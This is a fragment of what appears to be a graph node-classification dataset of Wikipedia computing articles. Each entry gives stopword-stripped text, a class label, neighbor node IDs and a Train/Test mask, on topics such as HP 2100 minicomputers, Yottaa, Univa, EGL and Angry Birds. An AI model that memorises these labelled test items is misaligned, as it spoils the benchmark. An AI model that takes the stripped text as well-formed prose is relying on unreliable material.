later moved offices cupertino california building purchased varian associates becoming cupertino division led magleby new division completed design 2116a demonstrated 7–10 november 1966 joint computer conference san francisco one earliest 16-bit minis hit market notable unusual new instrumentation computer highly expandable design real-time support system featured oversized cabinet held 16 expansion cards could expanded 48 cards external expansion cage system launched 20 different instrumentation cards including counters nuclear scalers electronic thermometers digital voltmeters ac/ohms converters data amplifiers input scanners additional set added input/output devices like tape drives printers punched cards paper tape peripherals real-time service provided card slot assigned fixed interrupt vector called appropriate device driver machine entered market quickly became clear selling much rapidly business data processing market originally targeted instrumentation market led introduction 2115a 1967 removed much expansion capabilities make lower-cost offering commercial users simplified version shipped 2114a 1968 eight slots leaving room power supply incorporated main chassis 2115 2114 also lacked extensive dma control 2116 removed mathematical operations ran slightly slower speeds original models using core memory hardwired cpu november 1968 company released 2000a timeshare system later known hp 2000/access based 2116b 2116a expanded 8k core memory running hp time-shared basic used separate 2114 terminal server t-s basic allowed multiple user accounts created 16 users logged newer models 2000 b f used newer versions underlying cpu introduced models used low-end versions cpu terminal server 2000f instance used 2100s main cpu primary storage controller 2100a acted terminal server b c f models dual-processor last version 2000f 2100s 2100a cpu used 2100a connected 32 serial terminals via serial multiplexer interfaces spite relatively high costs — 2000f cost 105,000 1974 — first minicomputer offer time-shared basic made popular early-to-mid 1970s hp 2000 series introduced 1969 sold june 1978 supported 1985 versions many seminal basic games written ported platform notable among mike mayfield star trek 1971 popularity made dialect basic lingua franca many basic listings normally provided format people computer company published programs hp 2000 format 32 users largest configuration hp-2000 part university timesharing life used coursework much somewhat later case decsystem-20 1970s lineup constantly improved new models remained compatible software expansion original 2116 early 1970 fred allard formerly ampex memory core division asked design new magnetic-core memory system systems rather continue purchasing ampex using newer 18 mil cores 22 mil using single sense/inhibit line able fit 8 kw memory onto single expansion card used starting 2116c models 1971 updated 2100a replaced entire existing 211x lineup overall system similar earlier models continued based core memory physically resembled 2114 power supply built-in limited internal expansion however cpu rebuilt microcode could user-programmed added hardware multiply divide added simple memory protection system caused high-priority interrupt triggered two-channel dma controller provided higher throughput optional floating-point unit also available front panel buttons illuminated small incandescent lamps burned use use switched-mode power supply allowed chassis significantly smaller earlier models 1972 hp shipped 4,500 minis making one largest companies market year merged mountain view division made magnetic tape drives cupertino division create data systems division dsd time hp 3000 project serious trouble february 1973 packard sent paul ely take division sales 2100 series remained strong 6000th shipped august 1973 8000th february 1974 10,000th february 1975 declared obsolete 1978 1972 division decided move 4kbit sram memory chips place core twice fast contemporary low-cost core much smaller allowing 32kword machines built 2114-like form factor time made decision 4kbit srams actually available experimental machines using core 2100 series used initially replaced 1kbit sram first appeared 4k parts would available time rest machine upgraded company canvassed various manufacturers found aggressively developing 4k parts particular intel mostek motorola texas instruments suggesting parts would available quantity late 1974 using memories expansion chassis like earlier systems meant room much memory megaword range however cpu use 15-bit addresses limited size 32kwords address desire larger systems hp developed dynamic mapping system dms dms expanded address format 15 20 bits allowing maximum 1,048,576 words dramatic expansion original system changes led 1974 introduction first 21mx series machines stood 21-m processor 21-x memory memory control systems separated cpu order provide flexibility case chosen 4k parts changed production proved useful practice machines shipped memories using either motorola texas instruments parts could mixed single machine higher density system based 16-pin mostek parts could supported replacing normal 21-x/2 controller 21-x/1 entire 2100 series replaced 1974 first 21mx series machines using highest-density parts new machines could support 1.2 mb largest models cpu upgraded 1976 new models became 21mx e-series original models retroactively became 21mx m-series main difference e e used clever timing improve speed twice m. wider variety machine styles released part 21mx series including smaller systems four slots larger ones 9 14 slots 21mx series featured memory management unit semiconductor memory expandable 1,048,576 words one megaword bit displays front panel buttons used small red light-emitting diodes leds instead burnout-prone incandescent bulbs used earlier versions 21mx ran hp rte real time operating system os started refrigerator-sized 19-inch rackmount systems lights switches front panels last models would use 1-chip processor fit desk using console terminal rather front panel new l series models hp-ib interface ability hp systems time blinking led lights removed front panel despite customer demands real-time ability hp r efforts using installable real-time card rte-a os good real-time operations rte 21mx important reason computer hard kill many companies use real-time operations take measurements control processes — turn pump heater valve speed slow motor etc end 1977 entire line renamed hp 1000 becoming hp 1000 m-series hp 1000 e-series next year hp 1000 f-series introduced e-series added floating point unit 1978 success line propelled hp become fourth largest manufacturer minicomputer space trailing dec ibm data general 1980 hp 1000 l-series introduced used new processor based hp large scale integration silicon sapphire process additionally expansion cards also equipped processors allowed access main memory conduct input/output without bothering cpu although made expansion cards incompatible earlier models first time also greatly improved overall performance models lacked memory management unit l-series turn replaced 1982 hp 1000 a-series included new lightning cpu design reached 1 mips even faster magic cpu 3 mips wide variety different models produced including desk-side towers variety different size rack-mount systems low-end a400 model introduced 1986 final high-end a990 released 1990 addressable 32 mb ram 2000 2100 desginations reused hp 2100 designed era ram form magnetic core memory falling dollars pennies per bit implementing processor registers using transistors small-scale integration remained expensive favored designs registers storage ram turn influenced instruction set architecture isa use memory-memory memory-accumulator design basic concept first widely introduced seminal 12-bit pdp-8 spawned many similar designs like 2100 2100 addresses 15-bits long allowing total 32k 16-bit words memory 64kb modern terms smallest addressable unit memory 16-bit word instructions fetch single 8-bit byte address broken two parts 5 significant bits refer one 32 pages 10 least significant bits displacement pointing single word within 1,024-word page dms system 21mx series upper 5 bits instead used select one 32 registers holds 12 bits least significant 10 bits register placed front original 10-bit displacement produce 20-bit address two significant bits used implement memory protection processing handled two b registers 16 bits wide registers also accessible memory locations 0 1 respectively means one load value accumulator using normal register-save operation instance codice_1 load value register memory location 1 thereby copying value b addition b registers cpu also includes register holds current memory address register holds value address p register used program counter automatically incremented every instruction also used base address memory accesses see calculated placed m. also two one-bit registers overflow extend additionally 16-bit witch /d isplay register used input output front panel certain areas memory reserved special purposes like locations 0 1 used accumulators additional words lowest 64-locations memory used direct memory access dma vectored interrupts see later models highest 64 words available memory reserved boot loader original instruction set contained 68 70 instructions 68 instructions standard instruction set 16 bits long execute one memory cycle 16 clock cycles although indirect addressing codice_2 use 36 cycles conditional branching done conditional skip-over-one instruction one instruction normally jump instruction stack subroutines instead first memory location routine reserved return address written location codice_3 instruction means internal support re-entrant code support added via user implemented stack three basic styles instructions isa memory references register references input/output certain models extended isa add-on hardware adding instance floating point instructions additional integer math memory instructions would fall three basic categories memory instructions use four bits instruction two special flags total six bits 16-bit word leaves room 10-bit address instruction stored least significant bits lsbs 0 9 bit 15 set indicates indirect addressing instead direct direct mode address instruction address operand indirect mode address pointer another memory location contained address operand one could set bit 15 location well allowing indirection required depth ending one locations 0 bit 15 addition direct/indirect mode bit 10 instruction controls z/c flag set 0 means address upper five bits zero lower 10 value instruction allows fast access z ero page first 1,024 words memory set 1 address constructed combining 10 bits instruction top 5 bits p register c urrent page memory allowing memory accessed 32 pages 1024 words thus 2,048 words addressed given time 1,024 within page zero another 1,024 within page instruction performing reference register instructions require address thus free bits work used pack four eight instructions single memory word used properly significantly speed operations total 39 register operations included broken shift-and-rotate instructions alter-and-skip instructions indicated bit 10 bit 11 indicates whether applied register b two general classes register instructions shift-and-rotate group alter-and-skip first used basic bitwise manipulation values register four instructions per word although two instructions middle always codice_4 clear e skip a/b zero second group eight instructions perform increments registers conditional branch normally used implement loops input/output instructions normally communicate accumulators instruction format starts bits 1000 significant bits followed single bit indicating register use a=0 b=1 followed 1 h/c flag bit three bits instruction remaining six bits i/o device id channel allowing 64 devices device numbers used system i/o initiated clearing flag bit codice_5 setting c bit using codice_6 hardware notices pattern begins operation operation complete device sets flag bit program loads resulting data card using codice_7 instruction sends card codice_8 actual data transfer normally accomplished using interrupt system memory locations 4 63 decimal hold addresses routines jump interrupt fired providing 60 interrupt levels location 4 7 hard-wired power failures parity check errors later models memory protection errors locations 8 user-accessible interrupt vectors mapped i/o channel arranged priority order i/o device 13 produced interrupt cpu jumps location memory location 13 masked higher-priority interrupt 1 12 another key feature 2100 series separate direct memory access controller uses cycle stealing access memory cpu using times performing internal calculations instance using feature lengthy i/o processes completed cpu works problems system set sending instruction dma controller using i/o commands dma controller channel 6 initially sent instruction containing number i/o device wants use dma whether input write memory device output read memory device starting location memory data number words setup code often installed one interrupt vectors automating process dms separate tables cpu dma system dma load data separate parts extended memory hp supplied three-pass assembler machine using column-delimited format first area left line code label start column 1 present next comes instruction mnemonic parameters rest line used comment assembler allows basic mathematical expressions written directly instead using mnemonics also includes number pseudo-instructions like codice_9 set base address program addition assembler associated linker machines initially shipped fortran 66 compiler operating system i/o drivers time additional languages added including basic algol fortran iv fortran 77 hp ported implementations agl platform added commands basic produce graphics graphics terminals plotters similar expansion fortran called graphics/1000 2100s normally used real time executive operating system rte short several versions rte released different versions machine rte-ii 2114-2116 rte-iii 2100s rte-iv 21mx series rte-a series operating system shell even late 1970s primitive single-level file system file manager fmgr example command run fortran compiler would follows meaning run f77 program using special characters distinguish source file object executable files hp 1000 also one minicomputers restricted file names five characters rather six common time made porting even writing programs challenge later rte-a hp 1000 provided conventional directory structure 16.4 file names made ru command optional tods test oriented disk system developed technician hp board repair center improve turn-around time center used load diagnostics central repository opposed loading individual paper tapes tods also used hp 2116 thru 21mx-f series test systems missiles phoenix 9206b harpoon 9500d-354 tomahawk many others early test sets 9500a evolving 9500d followed ats automated test system specific hp test systems 9500d-a46 minuteman launch component test set ats-e35 peacekeeper/minuteman launch component test set hp 8580/8542 microwave ana/asa automatic network analyzer automated spectrum analyzer ran tods tdrss microwave transponder test set used tods large system also mtos magnetic tape operating system similar tods hp 9810 9820 9830 desktop computers use slow serialized ttl version 2116 cpu although ultimately use operating system application software instead relying user-friendly rom-based interpreters basic work powered integrated keyboards displays rather disks standard terminals 1975 hp introduced bpc one world first 16-bit microprocessors using hp nmos-ii process bpc usually packaged ceramic hybrid module emc ioc chips added extended math i/o instructions hybrid developed heart new 9825 desktop computer later 9845 workstation added mmu chip forerunners personal computers technical workstations major differences original 2116 architecture bpc microprocessor completely redesigned i/o structure removal multiple levels indirect addressing provision stack register subroutine call return elimination multiple indirection made additional bit available memory word containing indirect address allowing maximum memory capacity increased 32k 16-bit words 64k bpc also added input allowing current page relative location current instruction rather power-of-two aligned page bpc used wide range hp computers peripherals test equipment discontinued late 1980s poland manufactured hp 2114b clone since 1973 polish clones called prototype 1973 pilot production 17 machines 1975-1977 production series 150 machines 1978-1987 czechoslovakia produced hp 1000 compatible clones designated 4300 4500 4700 4900 1000 units delivered vendors aritma prague development zpa čakovice zpa trutnov 1973 1990 computers served power plants including nuclear ones industry military universities etc. high reliability real-time features operating systems dos/adt several versions unix oldest hybrid adt7000 1974 composed digital adt4000 analog adt3000 parts digital part interesting customers adt4316 1976 16k words ferrite core memory adt4500 1978 4m words semiconductor ram adt 4900 designed single-board computer mass production start czechoslovak people army used adt based momi 1 momi 2 mobile minicomputers built container carried tatra 148 truck",
    "neighbors": [
      512,
      1029,
      4742,
      7173,
      5384,
      1801,
      6664,
      9739,
      6033,
      7188,
      8732,
      1952,
      9762,
      6821,
      1192,
      10796,
      7983,
      7858,
      1461,
      8501,
      9911,
      9402,
      1469,
      2811,
      2241,
      2243,
      11075,
      5450,
      477,
      3680,
      2019,
      8551,
      5358,
      9714,
      3061,
      3960,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 9600,
    "label": 4,
    "text": "SpySubtract:spysubtract spysubtract name anti-spyware application microsoft windows developed intermute maintained trend micro new name trend micro anti-spyware came effect version 3.0 previous versions trend micro branding trend micro anti-spyware later discontinued november 30 2007 replaced trend micro antivirus plus antispyware 2008 program shareware available download 30-day trial previously spysubtract often pre-installed new desktop notebook computers",
    "neighbors": [
      6797,
      7983,
      11313,
      7515,
      127
    ],
    "mask": "Test"
  },
  {
    "node_id": 9601,
    "label": 7,
    "text": "Yottaa:yottaa yottaa web mobile optimization services company based waltham massachusetts main product platform helps website conversions well performance security featured publications include xconomy techcrunch boston globe wall street journal yottaa founded 2009 boston coach wei tsinghua university mit alumnus robert buffone studied applied mathematics suny brockport prior yottaa wei founded served chairman nexaweb apart office boston yottaa opened office beijing described anti-lean startup due rather big global team inception coach wei served ceo 2009 late 2014 continues executive chairman robert buffone serve company cto respectively vick viren vaishnavi acts ceo since late 2014 series round 2010 yottaa raised 4 million venture funding general catalyst partners stata venture partners cambridge west ventures build acceleration platform 2012 yottaa named raymie stata former cto yahoo board directors series b round 2012 company raised additional 9 million expand platform technology include monitoring security features following round yottaa masstlc award innovative technology year cloud beating likes acquia basho technologies 16 million raised 2013 round led intel capital also attracting funding previous investors expand sales marketing operations attract enterprise customers equity issuance december 2014 yottaa received 10.45 million early 2015 yottaa moved offices boston waltham massachusetts yottaa developed web mobile optimization platform providing cloud services improve website speed visibility device company initial target group mid-sized enterprises smes yottaa aiming sell platform software service yottaa platform combines adaptive content delivery network dynamic site acceleration web analytics internet security yottaa deals problem website speed software optimization problem instead dealing problem bits movement different places require code changes yottaa platform named context intelligence identifies user location browser device interaction web content sort application content delivery thus modifying web content match end user browsing context context intelligence comprises several components adaptivecdn delivery component appsequencing neutralizing ad-blocking software ensuring websites speed reduced instanton accelerating component contextsafe provides security platform impactanalytics offers web analytics",
    "neighbors": [
      10368,
      6851,
      3941,
      6576,
      3187,
      467,
      2428,
      8735
    ],
    "mask": "Test"
  },
  {
    "node_id": 9602,
    "label": 7,
    "text": "Univa:univa univa privately held software company develops workload management products manage applications services containers univa software-defined computing infrastructure workload orchestration solutions enable companies scale computer resources across on-premises cloud computing hybrid systems company based chicago offices canada germany univa develops sells supports univa grid engine software univa version grid engine workload distributed resource management technology univa announced january 2011 hired personnel formerly working oracle sun microsystems grid engine development october 2 2014 univa roll new version grid engine new functionality improved scalability performance resource control small large clusters october 22 2013 univa announced acquired intellectual property copyrights trademarks pertaining grid engine technology oracle would support oracle grid engine customers univa announced navops may 2016 new business unit products enable enterprises easily migrate cloud hybrid cloud navops launch migrates hpc workload cloud univa offers consulting services installation tuning configuration products univa founded 2004 name univa corporation carl kesselman ian foster steve tuecke time primarily known providing open source products technical support based around globus toolkit september 17 2007 company announced would merge austin texas-based united devices operate new name univa ud company operated univa ud formally dropping ud returning common use univa corporation leadership current ceo gary tyreman univa announced january 17 2011 hired principal founding engineers grid engine team oct 22 2013 univa announced acquired intellectual property well copyrights trademarks pertaining grid engine technology oracle take supporting oracle grid engine customers june 2014 technical partnership racing point f1 team formerly sahara force india univa announced may 2016 univa announced new business unit navops product line based grid engine cluster workload scheduling technology originally sun microsystems later acquired univa oracle navops line differs univa grid engine enables enterprises easily migrate cloud hybrid could increase efficiencies run containers scale march 2018 univa open sources navops launch née unicloud project tortuga apache 2.0 license",
    "neighbors": [
      11353,
      1185,
      4194,
      9665,
      5956,
      10597,
      1480,
      4011,
      1806,
      4463,
      2064,
      2710,
      3449,
      8702
    ],
    "mask": "Test"
  },
  {
    "node_id": 9603,
    "label": 5,
    "text": "Virtual_Link_Aggregation_Control_Protocol:virtual link aggregation control protocol virtual lacp vlacp avaya extension link aggregation control protocol provide layer 2 handshaking protocol detect end-to-end failure two physical ethernet interfaces allows switch detect unidirectional bi-directional link failures irrespective intermediary devices enables link recovery less one second vlacp far-end failures detected allows link aggregation trunk fail properly end-to-end connectivity guaranteed certain links internet aggregation group remote link failure detected change propagated partner port",
    "neighbors": [
      1284,
      7049,
      9937,
      5490,
      1303,
      3580,
      10175
    ],
    "mask": "Train"
  },
  {
    "node_id": 9604,
    "label": 5,
    "text": "EGL_(API):egl api egl interface khronos rendering apis opengl opengl es openvg underlying native platform windowing system egl handles graphics context management surface/buffer binding rendering synchronization enables high-performance accelerated mixed-mode 2d 3d rendering using khronos apis egl managed non-profit technology consortium khronos group acronym egl initialism starting egl version 1.2 refers khronos native platform graphics interface prior version 1.2 name egl specification opengl es native platform graphics interface x.org development documentation glossary defines egl embedded-system graphics library",
    "neighbors": [
      4902,
      7978,
      5612,
      7983,
      10480,
      5171,
      6069,
      8438,
      1849,
      11322,
      10971,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9605,
    "label": 2,
    "text": "Angry_Birds_(video_game):angry birds video game angry birds later remarketed angry birds classic 2009 casual puzzle video game developed rovio entertainment inspired primarily sketch stylized wingless birds game first released ios maemo devices december 2009 since time 12 million copies game purchased ios app store prompted developer design versions touchscreen-based smartphones notably android symbian windows phone blackberry 10 devices series since expanded include titles dedicated video game consoles pcs sequel angry birds 2 released july 2015 ios android gameplay revolves around players using slingshot launch birds pigs stationed around various structures goal destroying pigs playing field players advance game new types birds become available special abilities activated player rovio mobile supported angry birds numerous free updates add additional game content company also released stand-alone holiday promotional versions game angry birds game eventually praised critics success leveraging combination addictive gameplay comical style low price viable franchise long-term potential profit game popularity led release angry birds games personal computers gaming consoles created market merchandise featuring angry birds characters 2016 feature-length animated film several seasons television cartoons angry birds series combined tally 2 billion downloads across platforms january 2014 including special editions release original game called one mainstream games 2010 one great runaway hits 2010 largest mobile app success world seen 2011 angry birds player controls flock multi-colored birds attempting retrieve eggs stolen group hungry green pigs stage gameplay enemy pigs sheltered structures made various materials wood glass stone resembling children toy building blocks objective game eliminate pigs level using slingshot players launch limited set birds goal either striking enemy pigs directly damaging surrounding structures causing blocks collapse squash pigs player must set angle force bird travel pulling back slingshot using intuitive touch-controls mobile versions launch process quick casual visible trajectory data player simply selects point x-y field behind launch post virtual slingshot released various stages game additional objects tnt crates rocks incorporated structures power-ups may used enhance birds attack hard-to-reach pigs also levels players unlock bonus levels collecting golden eggs several different types birds used game distinguished color shape earliest levels basic red bird red available player advances game additional types birds become available birds effective particular materials special abilities may activated player bird airborne example yellow bird chuck speeds blue bird fragments three birds blues black bird bomb explodes white bird matilda drop egg-shaped projectile pink bird stella trap objects bubbles green bird hal boomerangs back giant red bird named terence similar original red bird damage structures smaller counterparts orange bird bubbles expands inflates pigs also vary hardiness relative size small pigs weaker easily vanquished direct hits debris damaged structures larger pigs able withstand damage succumbing defeat addition pigs wear hats armor making even resistant damage level starts quantity types firing order birds predetermined pigs eliminated last bird launched level completed next level unlocked birds run pigs defeated level incomplete must repeated points scored pig defeated well damage destruction structures hefty bonus points awarded unused birds upon completing level players receive one two three stars depending score received players encouraged repeat previously beaten levels full three stars n't awarded order fully master earn full three star rating early 2009 rovio staff began reviewing proposals potential games one proposal came senior game designer jaakko iisalo form simulated screenshot featuring angry-looking birds visible legs wings picture gave clue type game played staff liked characters team elected design game around early 2009 physics games crush castle popular flash-based web games rovio team inspired games development angry birds staff realized birds needed enemy time swine flu epidemic news staff made birds enemies pigs angry birds studio 52nd produced game initial release game sell many copies angry birds featured app uk app store february 2010 quickly reached no.1 reached 1 spot paid apps chart us app store middle 2010 stayed 275 days initial cost develop angry birds estimated exceed €100,000 including costs subsequent updates ios version rovio partnered distributor chillingo publish game app store chillingo claimed participated final game polishing adding visible trajectory lines pinch zoom pigs grunts birds somersaults landing since rovio self-published almost later ports game exception psp version produced license abstraction games rovio began writing new versions game devices new issues came light team began working version android systems observed large number configurations device types versions android software number combinations software version processor speed even user interfaces significantly larger ios version ultimately team settled minimum set requirements even though left nearly 30 types android phones unable run game including newly released phones released october 15 2010 one month initial release android rovio mobile began designing lite version game devices early 2010 rovio began developing version angry birds facebook project became one company largest development taking year company understood challenges transplanting game concept social platforms mobile/gaming systems march 2011 interview rovio peter vesterbacka said ’ take experience works one environment one ecosystem force-feed onto another like zynga ’ take farmville throw mobile see sticks titles successful mobile ones ’ built ground platform facebook version incorporate social-gaming concepts in-game purchases entered beta-testing april 2011 game became officially available facebook february 2012 improvements game include ability synchronize player progress across multiple devices example player completes level android phone log copy game android tablet see statistics level progress initial ios version game included single episode entitled poached eggs contained three themed chapters 21 levels time time rovio released free upgrades include additional content new levels new in-game objects even new birds updates released incorporated game full version offered download platform application store first update released february 11 2010 added new episode called mighty hoax containing two new chapters 21 levels updates released april 6 2010 added golden eggs feature placed hidden golden eggs throughout game would unlock bonus content found new episode called danger initially contained single chapter 15 levels two later updates added two chapters danger 15 levels big setup episode released july 18 2010 added new chapter 15 levels additional golden egg levels big setup later given two chapters 15 levels fifth episode called ham 'em high launched december 23 2010 celebration game first year ios app store ham 'em high contained 15 american old west-themed levels single chapter updates february 4 2011 march 18 2011 added one new 15-level chapter ham 'em high also introduced mighty eagle new bird may used per hour clear uncompleted levels mighty eagle also used previously completed levels without once-per-hour limit play mini-game called total destruction player attempts destroy much scenery possible standard birds mighty eagle achieving 100 destruction earns player mighty eagle feather level mighty eagle offered one-time in-game purchase initially available ios app store customers itunes accounts pre-linked credit cards late 2011 rovio also added mighty eagle chrome app version game rovio begun testing android update called bad piggy bank elisa wireless service finland t-mobile allows users charge in-app purchases mighty eagle mobile phone bills service went live android release version 2.2.0 august 2012 using google play transaction system allows mobile billing credit cards allowing android phones wifi-only tablets unlock features version also added powerups facebook version added option pay remove ads allowing android players enjoy game ad-free ios players sixth episode mine dine released june 16 2011 15 new mining-themed levels new golden egg august 24 2011 update expanded mine dine two 15-level chapters seventh update birdday party released december 11 2011 commemorate second anniversary first release ios version itunes app store included 15 new birthday cake-theme levels well updated graphics addition elements spin-off games scoring graphic seen angry birds rio introduction orange bird first appeared angry birds seasons update later released android microsoft windows eighth update released initially ios march 20 2012 lead-up release angry birds space new update included animated tutorial enhanced gameplay new ui graphics first 15 levels surf turf angry birds facebook -exclusive episode see another 15 levels added later ios version receiving power-ups first seen facebook version october 9 2012 final chapter surf turf released along new episode called bad piggies released advertise new rovio game bad piggies another update released december 11 2012 3rd anniversary game release 15 new levels birdday party 15 new levels bad piggies second set 15 levels birdday party introduced pink bird game 15 levels later released bad piggies episode march 7 2013 day final 15 levels released angry birds became free app week apple app store march 14 2013. became instant hit top free app charts app store march 18 2013 app returned normal price 0.99 june 17 2013 rovio teased facebook page red main protagonist game would receive ability new episode june 26 2013 rovio released youtube video uncovering three new facts episode would called red mighty feathers update would come july angry birds app icon would receive new design july 3 2013 update released fifteen levels all-new game play instead knocking pigs castles player goal keep pigs stealing egg leaving playing field pigs arrive waves complicated vehicles available bird red whose new ability target nearest pig score three stars awarded completing three objectives one try first objective finish level without getting egg stolen second pop pigs level third use fewer equal certain number birds clear level people skeptical new gameplay rovio later announced would add levels episode based original level style september 16 2013 rovio added 15 levels episode using original style levels include manual targeting red bird november 26 2013 rovio added 30-level episode called short fuse transforms bomb explosions highly-destructive electrical pulses adds powerup transforms bird bomb bird 3 different potions change pigs december 11 2013 rovio added 15 levels episode birdday party cake 4 celebrate fourth birthday march 4 2014 15 levels added short fuse power-up icons updated july 22 2014 15-level episode called flock favorites inspired fans favorite episodes poached eggs danger mine dine bad piggies red mighty feathers short fuse surf turf added november 23 2014 partnership red apple inc. update app released exclusive ios update added special red -themed golden egg level red power red mighty feathers episode stand-alone power-up purchased used indefinitely 1 use per level 100 money went global fund end aids purchase available december 7 2014 december 11 2014 honor angry birds 5th birthday episode 30 user-inspired levels added june 23 2015 flock favorites added 15 levels inspired previous episodes december 11 2015 honor angry birds 6th birthday new 15 levels added birdday party december 11 2016 honor angry birds seventh birthday 15 levels added birdday party may 16 2017 dual virtual currency system added game currency earned throughout gameplay accrued in-app purchases used purchase power-ups in-game items since initial release nokia n900 multimedia internet device apple iphone ipod touch mobile digital devices rovio released versions angry birds additional devices ipad-exclusive version angry birds hd released ipad mobile digital device april 2010 august 2010 angry birds made available palm pre phone running palm webos operating system app catalog online store symbian^3 phones received version game october 2010 initially includes poached eggs mighty hoax episodes angry birds works kindle fire kindle fire hd may 2010 rovio announced plans version devices using google android operating system beta version released android market google play september 2010 full android version game first released instead getjar october 2010 though subsequently released android market within days rovio officials noted getjar global reach android market getjar availability smartphone platforms including symbian would make cross-platform promotion game easier unlike previous versions angry birds android free ad-supported application paid applications n't available android nations update called bad piggy bank enabled players buy in-game ads october 2010 microsoft suggested one websites windows phone version angry birds development rovio complained microsoft asked permission make statement noting time committed design windows phone version although rovio asked microsoft revise site remove references game windows phone version ultimately released june 2011 near end 2010 rovio stated developing new ports game time devices outside mobile phone market january 2011 three ports launched first sony announced release angry birds playstation portable handheld system form playstation mini game includes nearly 200 levels original game version also playable playstation 3 next rovio announced release windows version game january 4 2011 available sale exclusively intel appup center included 195 levels launch plans exclusive features available smartphone versions one day windows version released mac app store launched one first offerings version angry birds ports angry birds also proposed wii nintendo ds systems former becoming realized angry birds trilogy see 3d-enhanced version game proposed release lg optimus 3d october 2011 popularity angry birds helped spread game devices initially designed gaming machines barnes noble announced future update nook color e-reader let android-based device run applications including port angry birds june 2011 rovio announced plans partner roku include version angry birds new model internet-connected set-top box roku 2 xs may 2011 in-browser html5 version angry birds released beta form game uses webgl canvas distributed chrome web store use google chrome web browser runs webgl- canvas-enabled browser features exclusive content played chrome exclusive levels so-called chrome bombs version includes offline playability features 60 fps gameplay selection graphics settings accommodate variety hardware capabilities october 2011 nokia world 2011 announced angry birds would come preloaded nokia asha series series 40 touch handsets aimed emerging markets india china south africa december 2011 rovio released angry birds hd angry birds seasons hd angry birds rio hd blackberry playbook tablet research motion january 2012 angry birds released devices using bada os february 2012 angry birds made official debut facebook known angry birds friends since may 23 2012 version launched two chapters original game along exclusive surf turf chapter facebook version adds number new power-up items maximum two use per level example power potion power-up formerly known super seeds make launched bird larger thus powerful king sling power-up makes slingshot stronger able launch birds higher faster power-ups purchased in-game given friends also play game surf turf would later included original mobile versions game starting ios facebook version features weekly tournaments among friends top 3 winners earning free in-game bird coins used purchase power-ups unique green day themed episode facebook version game however removed december 2012 2012 electronic entertainment expo los angeles california rovio distribution partner activision announced plans bring angry birds two spin-off games angry birds seasons angry birds rio playstation 3 xbox 360 nintendo 3ds systems bundled together angry birds trilogy games built specifically respective consoles taking advantage unique features support playstation move kinect high-definition displays glasses-free 3d visuals trilogy also ported wii wii u almost year later motion controlled version game also released samsung smart tv app reviews angry birds mostly acclaimed critics chris holt macworld called game addictive clever challenging puzzler pocket gamer keith andrew said angry birds nugget puzzling purity dished relish aplenty jonathan liu wired news wrote going maximum number stars certainly adds lot replay value fairly extensive game reviews first versions game use touch-screen playstation 3/psp version windows version also positive disagreement different interfaces greenwald pc magazine review playstation network version said control scheme platforms good 're nearly satisfying touch-screen controls found smartphone versions playstation 3 version appeared blocky unpleasant like smartphone screen blown hdtv size conversely greg miller ign preferred analog control setup psp version saying offered tiny variances control n't feel like get fat finger screen giving game positive review miller concluded denying angry birds fun could use polish – sharper visuals better price smoother action damien mcferrin british website electric pig reviewed pc version saying mouse-driven control method showcases many distinct advantages finger-focused counterpart angry birds also described critically impossible understand playing rules criteria game critic chris schiller eurogamer.net contemptuous attitude towards players keeping frustrated enough switch play something else instead angry birds became top-selling paid application apple uk app store february 2010 reached top spot us app store weeks later remained october 2010 since release free limited version angry birds downloaded 11 million times apple ios full-featured paid version downloaded nearly 7 million times september 2010 android version game downloaded 1 million times within first 24 hours release even though site crashed one point due load 2 million downloads first weekend rovio receives approximately us 1 million per month revenue advertising appears free android version according rovio players logged 5 million hours game time day across platforms series 200 million monthly active users may 2012 november 2010 digital trends stated 36 million downloads angry birds one mainstream games right msnbc video game news blog written n game app comes close following christian science monitor remarked angry birds one great runaway hits 2010 december 2010 honor one-year anniversary release angry birds rovio mobile announced game downloaded 50 million times 12 million ios devices 10 million android january 2014 angry birds series reached 2 billion downloads including angry birds angry birds seasons angry birds rio angry birds space angry birds star wars ii angry birds go christmas day 2011 alone 6.5 million copies various angry birds games downloaded across supported platforms history apple app store angry birds holds record days top paid apps chart spent total 275 days no.1 position angry birds rio no.1 total 23 days ranking ninth list apple itunes rewind list popular itunes store media 2011 angry birds top-selling paid iphone/ipod app app store free version fourth-most downloaded game two special-edition versions angry birds seasons angry birds rio also ranked top 10 paid iphone/ipod apps ipad-exclusive angry birds hd versions top-selling top-downloaded ipad apps year mattel also made board games based app called angry birds knock wood angry birds thin ice angry birds mega smash february 2010 angry birds nominee best casual game award 6th annual international mobile gaming awards barcelona spain september 2010 ign named angry birds fourth best iphone game time april 2011 angry birds best game app app year uk appy awards 2011 webby awards angry birds awarded best game handheld devices",
    "neighbors": [
      9408,
      10080,
      3300,
      9605,
      231,
      9063,
      8937,
      3626,
      6539,
      2285,
      6797,
      1776,
      10480,
      1619,
      57,
      1083,
      8413
    ],
    "mask": "None"
  },
  {
    "node_id": 9606,
    "label": 3,
    "text": "TIM-600:tim-600 tim-600 important pc computer system series tim microcomputers mihajlo pupin institute-belgrade developed 1987-1988 see ref.lit 1 2 6 based intel microprocessor types 80386 80387 word-length 32 bits basic cycle time 20 mhz operating system unix v.3 ref.lit. 3 6 computer system tim-600 exposed munich international computer exhibition september 1988 fig.1 tim designers tim-600 architecture based three system buses 32 16 8-bits respectively cpu performs 5,000.000 simple operations per second primary memory ram 8 x 2 mb capacity max eight tim terminals equipment units max connected rs-232c centronics types interface used line printers also possibilities connections two hard disks well magnetic cassettes diskettes tim-600 uses programming languages c++ fortran cobol basic pascal data base management performed informix oracle software ref.lit 4 5 6 computer system tim-600 used business data processing many offices serbia example public health scientific organizations process automation industrial production road traffic control banks military government services etc",
    "neighbors": [
      6859,
      8524,
      10635,
      7983,
      7665,
      10356,
      3960
    ],
    "mask": "Test"
  },
  {
    "node_id": 9607,
    "label": 4,
    "text": "List_of_computer_security_certifications:list computer security certifications credentialing process establishing qualifications licensed professionals organizational members organizations assessing background legitimacy computer security information security fields number tracks professional take demonstrate qualifications four sources categorizing many credentials licenses certifications quality acceptance vary worldwide security credentials well-known high quality examples like master degree field accredited school cissp microsoft certification controversial list many dozens lesser known credentials organizations addition certification obtained taking courses and/or passing exams case cissp others noted demonstrating experience and/or recommended given reference existing credential holder award certificates also given winning government university industry sponsored competitions including team competitions contests scope note article certification credentialing individuals include certification organizations classified computer systems authorizing accrediting approval bodies authorities meeting prescribed set safeguards",
    "neighbors": [
      5636,
      10756,
      9356,
      8462,
      3473,
      5010,
      8978,
      10392,
      5373,
      5246,
      4892,
      5404,
      2975,
      2213,
      8613,
      8998,
      939,
      3629,
      9646,
